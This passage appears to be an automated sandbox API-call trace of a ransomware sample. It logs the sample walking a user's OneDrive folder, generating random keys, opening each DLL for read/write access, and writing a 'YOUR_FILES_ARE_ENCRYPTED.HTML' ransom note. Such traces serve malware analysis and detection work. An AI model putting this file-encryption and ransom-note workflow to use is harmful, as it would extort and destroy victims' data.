ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa590c130, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x576b0, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSyncShell64.dll", cAlternateFileName="FILESY~2.DLL")) returned 1 [0159.825] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll") returned 97 [0159.825] lstrcmpW (lpString1="FileSyncShell64.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.825] PathFindExtensionW (pszPath="FileSyncShell64.dll") returned=".dll" [0159.825] lstrlenW (lpString=".dll") returned 4 [0159.825] PathFindExtensionW (pszPath="FileSyncShell64.dll") returned=".dll" [0159.825] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0159.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\filesyncshell64.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0159.830] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=358064) returned 1 [0159.832] GetProcessHeap () returned 0x270000 [0159.832] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0159.854] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="A5") returned 2 [0159.854] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="08") returned 2 [0159.854] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="F8") returned 2 [0159.854] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="E2") returned 2 [0159.854] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="E8") returned 2 [0159.854] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="8E") returned 2 [0159.854] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="79") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="70") returned 2 
[0159.855] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="81") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="E3") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="DE") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="63") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="02") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="FE") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="3D") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="C4") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="73") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="A5") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="4B") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="47") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="26") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="58") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="81") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="77") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="90") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="87") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="D3") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="E0") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="9B") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: 
param_1="D3") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="7F") returned 2 [0159.855] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="4D") returned 2 [0159.856] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll" [0159.856] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.856] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0159.857] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5a3cc30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5a3cc30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5c780d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x20eb0, dwReserved0=0x0, dwReserved1=0x60, cFileName="LoggingPlatform64.dll", cAlternateFileName="LOGGIN~1.DLL")) returned 1 [0159.857] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\LoggingPlatform64.dll") returned 99 [0159.857] lstrcmpW (lpString1="LoggingPlatform64.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.857] PathFindExtensionW (pszPath="LoggingPlatform64.dll") returned=".dll" [0159.857] lstrlenW (lpString=".dll") returned 4 [0159.857] PathFindExtensionW 
(pszPath="LoggingPlatform64.dll") returned=".dll" [0159.857] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0159.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\LoggingPlatform64.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\loggingplatform64.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0159.860] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=134832) returned 1 [0159.860] GetProcessHeap () returned 0x270000 [0159.860] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0159.860] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="CC") returned 2 [0159.860] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="85") returned 2 [0159.860] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="8F") returned 2 [0159.860] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="C8") returned 2 [0159.860] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="1B") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="36") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="3B") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="78") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="04") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="54") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="B0") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="94") returned 2 [0159.861] wsprintfW (in: 
param_1=0x4ebce36, param_2="%02X" | out: param_1="12") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="E2") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="56") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="A0") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="BC") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="64") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="5E") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="36") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="39") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="CF") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="04") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="CE") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="17") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="58") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="C4") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="BC") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="F7") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="0B") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="43") returned 2 [0159.861] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="65") returned 2 [0159.862] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\LoggingPlatform64.dll" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\LoggingPlatform64.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\LoggingPlatform64.dll" [0159.862] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.862] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0159.929] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa5e1aff0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa5e1aff0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa5e1aff0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xa17c8, dwReserved0=0x0, dwReserved1=0x60, cFileName="msvcp110.dll", cAlternateFileName="")) returned 1 [0159.938] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll") returned 90 [0159.939] lstrcmpW (lpString1="msvcp110.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.939] PathFindExtensionW (pszPath="msvcp110.dll") returned=".dll" [0159.939] lstrlenW (lpString=".dll") returned 4 [0159.939] PathFindExtensionW (pszPath="msvcp110.dll") returned=".dll" [0159.939] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0159.939] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcp110.dll"), dwDesiredAccess=0xc0010000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0159.940] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=661448) returned 1 [0159.940] GetProcessHeap () returned 0x270000 [0159.940] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0159.943] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="4D") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="58") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="1D") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="E6") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="BD") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="AA") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="AA") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="A6") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="42") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="45") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="D4") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="AB") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="DE") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="79") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="5E") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="30") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="2F") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce4a, 
param_2="%02X" | out: param_1="57") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="9F") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="86") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="8B") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="E0") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="D9") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="57") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="95") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="A4") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="08") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="2C") returned 2 [0159.944] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="74") returned 2 [0159.945] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="74") returned 2 [0159.945] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="31") returned 2 [0159.945] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="73") returned 2 [0159.945] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll" [0159.945] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.945] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, 
dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0159.947] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa600a1d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa600a1d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa600a1d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xca5c8, dwReserved0=0x0, dwReserved1=0x60, cFileName="msvcr110.dll", cAlternateFileName="")) returned 1 [0159.950] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll") returned 90 [0159.998] lstrcmpW (lpString1="msvcr110.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.998] PathFindExtensionW (pszPath="msvcr110.dll") returned=".dll" [0159.998] lstrlenW (lpString=".dll") returned 4 [0159.998] PathFindExtensionW (pszPath="msvcr110.dll") returned=".dll" [0159.998] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0159.998] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcr110.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0159.999] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=828872) returned 1 [0159.999] GetProcessHeap () returned 0x270000 [0159.999] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0160.000] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="35") returned 2 [0160.000] wsprintfW 
(in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="52") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="5D") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="AF") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="1F") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="3F") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="AB") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="CB") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="B4") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="C8") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="02") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="1C") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="D5") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="9C") returned 2 [0160.000] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="D3") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="DC") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="56") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="BA") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="FF") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="BA") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="C7") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="BA") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="B9") 
returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="EC") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="76") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="D9") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="30") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="10") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="1D") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="08") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="87") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="0B") returned 2 [0160.002] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll" [0160.002] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.002] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0160.002] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa600a1d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa600a1d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa600a1d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xca5c8, dwReserved0=0x0, 
dwReserved1=0x60, cFileName="msvcr110.dll", cAlternateFileName="")) returned 0 [0160.002] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.003] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0160.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.003] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.005] CloseHandle (hObject=0x5a8) returned 1 [0160.006] GetProcessHeap () returned 0x270000 [0160.007] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.007] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6030330, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa61d3250, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa61d3250, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ar", cAlternateFileName="")) returned 1 [0160.007] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ar") returned 74 [0160.007] 
GetProcessHeap () returned 0x270000 [0160.007] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.007] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ar" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ar") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ar" [0160.007] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ar", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ar\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ar\\*" [0160.007] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ar\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6030330, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa61d3250, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa61d3250, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.008] FindNextFileW (in: hFindFile=0x42f3280, 